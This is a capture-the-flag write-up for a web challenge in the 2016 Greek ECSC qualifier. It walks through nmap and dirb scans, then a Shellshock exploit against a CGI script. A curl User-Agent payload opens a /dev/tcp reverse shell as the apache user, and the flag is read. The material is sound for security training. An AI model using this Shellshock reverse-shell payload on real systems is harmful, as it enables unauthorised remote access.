Category: Web security

You can download the Web Security Challenge, along with all the challenges for the 2016 Greek Qualifier CTF of European Cybersecurity Challenge, in this link. More details on the Greek ECSC 2016 Qualifier CTF event can be found here.

Points: 60

Challenge designer: nasosnik

Description: > Obtain a command shell on the remote host as apache user.

Write-up

First we scan the host and discover two HTTP services running on ports 80 and 8801.

root@kali:~# nmap -sT -Pn 192.168.200.211 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-07-09 10:42 EEST
Nmap scan report for 192.168.200.211
Host is up (0.0017s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
8801/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 3.78 seconds

On port 80 there was a WordPress blog. However, after some experimentation it didn’t seem to be our entry point. So, we switched our attention on port 8080. Starting with a directory scan we found an accessible CGI script (/cgi-bin/debug).

root@kali:~# dirb http://192.168.200.211:8801/cgi-bin/ -r -f -N 404

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Aug 30 08:13:58 2016
URL_BASE: http://192.168.200.211:8801/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Ignoring NOT_FOUND code -> 404
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.200.211:8801/cgi-bin/ ----
+ http://192.168.200.211:8801/cgi-bin/debug (CODE:200|SIZE:45)

-----------------
END_TIME: Tue Aug 30 08:14:01 2016
DOWNLOADED: 4612 - FOUND: 1

The target server was found vulnerable to Shellshock, a well-known bug publicly disclosed on 2014. We exploit Shellshock to get a reverse shell using the /dev/tcp device (nc was missing from the system).

root@kali:~# curl http://192.168.200.211:8801/cgi-bin/debug -H 'User-Agent: () { :;}; /bin/sh -i >& /dev/tcp/192.168.200.9/33444 0>&1'
root@kali:~# nc -nvvlp 33444
Listening on [0.0.0.0] (family 0, port 33444)
Connection from [192.168.200.211] port 33444 [tcp/*] accepted (family 2, sport 39126)
sh: no job control in this shell
sh-4.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.1$ cat flag.txt
flag{You_Win_th1s_Time}

The flag is: > flag{You_Win_th1s_Time}

# echo 7eamnull

Share This

Share this post with your friends!